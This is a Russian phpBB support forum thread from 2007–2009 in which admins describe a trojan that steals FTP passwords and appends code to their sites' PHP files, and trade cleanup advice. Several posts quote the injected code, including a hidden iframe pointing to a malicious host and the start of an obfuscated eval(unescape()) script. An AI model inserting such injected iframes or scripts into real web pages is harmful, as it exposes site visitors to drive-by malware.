Пропустить

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Свернуть Развернуть Правила форума Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ-3 (phpbb3) | Как задавать вопросы | Как устанавливать моды

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).

Как убить Трояна?

Сообщение AdmninsCluba » 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

AdmninsCluba
phpBB 1.2.0
 
Сообщения: 17
Зарегистрирован: 03.09.2006 19:10
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Форум лег, появились "кракозяблики"

Сообщение izstas » 09.07.2008 23:24

Попробуйте отключить gzip
Аватара пользователя
izstas
phpBB 2.0.0
 
Сообщения: 120
Зарегистрирован: 18.03.2007 17:03
Откуда: Елец
Благодарил (а): 0 раз.
Поблагодарили: 2 раз.

Re: Форум лег, появились "кракозяблики"

Сообщение Палыч » 10.07.2008 0:42

Prosvetlenie
Рекомендую провериться на наличие в коде файлов "левых" включений кода.
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
Аватара пользователя
Палыч
Просто Палыч
Просто Палыч
 
Сообщения: 9467
Зарегистрирован: 24.05.2006 23:20
Откуда: Питер
Благодарил (а): 3 раз.
Поблагодарили: 337 раз.

Re: Форум лег, появились "кракозяблики"

Сообщение модем » 10.07.2008 2:27

У меня была такая дрянь. Вирус. В конце почти каждого файла была строка типа <?php echo iframe......?>. Вылечил восстановлением из резервной копии.

модем
phpBB 1.0.0
 
Сообщения: 5
Зарегистрирован: 11.02.2008 3:50
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Форум лег, появились "кракозяблики"

Сообщение Prosvetlenie » 10.07.2008 13:52

Спасибо всем ) буду лечить
Вчера - это история. Завтра - тайна. Настоящее - это дар. Жизнь есть волшебство, и вкус каждого момента неповторим

Психологическое консультирование и тренинги (Киев) - http://www.metapsy.org.ua/
Аватара пользователя
Prosvetlenie
phpBB 1.0.0
 
Сообщения: 4
Зарегистрирован: 17.12.2007 1:17
Откуда: Украина, Киев
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Предупреждения: 1

Re: Форум лег, появились "кракозяблики"

Сообщение Prosvetlenie » 10.07.2008 18:09

Дело решил так: в корневой папке форума во всех пхп файлах в конце кода добавился код вируса... начинался он так:
<!-- [ 75e2d43649934e330eb179ccbf91445a ] --><script>eval(unescape('function%20gGYuu%28hAI%29%7Bfunction%20oJHWp%28hEIh%29%7Bvar%20tXXEPU%3D0%3Bvar%20hReZ%3
и так далее.... довольно большой кусок... Удалил, и все работает :) Всем кто помогал - спасибо!
Вчера - это история. Завтра - тайна. Настоящее - это дар. Жизнь есть волшебство, и вкус каждого момента неповторим

Психологическое консультирование и тренинги (Киев) - http://www.metapsy.org.ua/
Аватара пользователя
Prosvetlenie
phpBB 1.0.0
 
Сообщения: 4
Зарегистрирован: 17.12.2007 1:17
Откуда: Украина, Киев
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.
Предупреждения: 1

Re: Как убить Трояна?

Сообщение DK7 » 10.07.2008 19:00

Prosvetlenie
обязательно поменяйте пароли к фтп. иначе через недельку вирус сново постучится).
И не держите пароли в фтп клиенте.
Аватара пользователя
DK7
Модератор
Модератор
 
Сообщения: 939
Зарегистрирован: 17.07.2006 15:52
Откуда: Кишинёв
Благодарил (а): 6 раз.
Поблагодарили: 11 раз.

Re: Как убить Трояна?

Сообщение DJ Sample » 02.12.2008 4:29

Та же самая фигня :(
В конце файлов index.php и index.htm добавляется код
<?php echo '<div style="visibility:hidden"><iframe src="http://gfdsgf333.com/in.cgi?27" width=100 height=80></iframe></div>'; ?>

Посмотрел в панели управления в логах авторизации - там по фтп куча авторизаций с разны ип, точно не моих.
Код вычищаю, пароль на фтп не менял, сегодня сменю.
Но может кто-нибудь в курсе, что за вирус таким занимается, и где он, на моём компе сидит?
Стоит антивирь norton antivirus, что-то ничего не находит.. :(
Tranceaddicted

DJ Sample
phpBB 2.0.2
 
Сообщения: 157
Зарегистрирован: 02.06.2004 14:35
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение Alek$ » 02.12.2008 16:30

DJ Sample
поставьте еще какой-нибудь антивирус, обязательно смените ВСЕ пароли и проверьте сайт на наличие левых файлов.
А троянов, которые крадут пароли, существует сотни.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
Alek$
Лидер модераторов
Лидер модераторов
 
Сообщения: 2653
Зарегистрирован: 03.08.2005 13:46
Откуда: Новосибирск
Благодарил (а): 3 раз.
Поблагодарили: 45 раз.

Re: Как убить Трояна?

Сообщение Mic70 » 08.01.2009 20:42

Блин, ну что за люди! Я же писал : поставьте CHMOD444 на все файлы index и ВСЁ!!! У меня с тех пор НИ РАЗУ не было этих троянов! З.Ы. Я, в отличии от Касперского, денег не беру! :D
Все говорят:"админ, админ!" А вы думаете нам, админам, легко?
Аватара пользователя
Mic70
phpBB 1.4.0
 
Сообщения: 35
Зарегистрирован: 17.07.2007 8:08
Благодарил (а): 1 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение DK7 » 08.01.2009 20:50

я так работаю .. вирус ворует пароли от фтп. Через коммандеры. В коммандере когда пишем пароль , указываем в нем на один лишний символ больше, к примеру в конце пароля.. Пароль запоминается и воруется трояном. Но он не верный.
При последующем соединении, соответственно пишет что неверный пароль, жмем на заново ввести пароль и просто трем последний символ , стираем бэкспейсом. Все тут же коннектится.
Вирус в таком случае бессильный. Не надо менять атрибуты доступа к файлам, отпадают ухищрения и т.д.
Все довольно просто. ИМХО.
Пока за месяцев 10 ни разу проблем не возникло...

Добавлено спустя 2 минуты 7 секунд:
Добавлю, перед этим нужно вычистить все файлы от вредоносного кода. А потом вполне то.
Аватара пользователя
DK7
Модератор
Модератор
 
Сообщения: 939
Зарегистрирован: 17.07.2006 15:52
Откуда: Кишинёв
Благодарил (а): 6 раз.
Поблагодарили: 11 раз.

Re: Как убить Трояна?

Сообщение Alek$ » 08.01.2009 21:00

Давайте еще и я выпендрюсь. У меня стоит Linux, под него трояны не пишут и я могу хранить пароли где угодно. Но это еще не все. Файл с паролями у меня шифруется алгоритмом GPG, 1024-битным ключом. Ни разу за всю жизнь никто не спер у меня пароля.

А если серьезно, то просто не храните пароли в стандартным хранилищах. Трояны тупые и даже незашифрованный файлик где-нибудь в моих документах не найдут, если вы, конечно, не назовете его passwords.txt. А еще лучше просто помнить самые важные пароли и не записывать нигде.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
Alek$
Лидер модераторов
Лидер модераторов
 
Сообщения: 2653
Зарегистрирован: 03.08.2005 13:46
Откуда: Новосибирск
Благодарил (а): 3 раз.
Поблагодарили: 45 раз.

Re: Как убить Трояна?

Сообщение FladeX » 09.01.2009 18:12

Alek$, зачет 8-)
У меня тож линукс, до сих пор ни одного инцидента не было :geek:
//
// Okay, let's do the loop, yeah come on baby let's do the loop
// and it goes like this ...
| phpBB Adept ] | Каталог форумов | генератор sitemap для форумов | форум про форумы
Аватара пользователя
FladeX
Former team member
 
Сообщения: 2079
Зарегистрирован: 02.06.2007 23:44
Откуда: Саранск
Благодарил (а): 6 раз.
Поблагодарили: 53 раз.

Re: Как убить Трояна?

Сообщение stealth0000 » 10.01.2009 6:13

Вредоносный фрейм:

<iframe src="http://liteto***catesite.cn/in.cgi?cocacola2" width=1 height=1 style="visibility: hidden"></iframe>


Будет добавлен в сегодняшнее обновление каспера.

stealth0000
phpBB 1.0.0
 
Сообщения: 4
Зарегистрирован: 03.09.2008 17:11
Благодарил (а): 0 раз.
Поблагодарили: 0 раз.

Re: Как убить Трояна?

Сообщение Alek$ » 10.01.2009 9:43

От греха подальше "побил" ссылку.
Самая страшная ошибка, это ошибка без видимых причин и конкретных последствий.
phpBB3 [db_update.php generator]
Первая помощь по всем phpBB-вопросам: phpBB2 и phpBB3 FAQ; Правила общения;
Все консультации в icq или личке - на платной основе.
Аватара пользователя
Alek$
Лидер модераторов
Лидер модераторов
 
Сообщения: 2653
Зарегистрирован: 03.08.2005 13:46
Откуда: Новосибирск
Благодарил (а): 3 раз.
Поблагодарили: 45 раз.

Re: Как убить Трояна?

Сообщение FladeX » 10.01.2009 21:28

DK7 писал(а):В коммандере когда пишем пароль , указываем в нем на один лишний символ больше, к примеру в конце пароля..

Кстати хакеры сейчас прочитают и кончится халява :lol:
//
// Okay, let's do the loop, yeah come on baby let's do the loop
// and it goes like this ...
| phpBB Adept ] | Каталог форумов | генератор sitemap для форумов | форум про форумы
Аватара пользователя
FladeX
Former team member
 
Сообщения: 2079
Зарегистрирован: 02.06.2007 23:44
Откуда: Саранск
Благодарил (а): 6 раз.
Поблагодарили: 53 раз.

Пред.След.

Вернуться в phpBB-пространство

 

  • Похожие темы
    Ответы
    Просмотры
    Последнее сообщение

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0

Бессрочный конкурс phpBB-ориентированных материалов
FastVPS — надёжный и доступный хостинг для phpBB
Изображение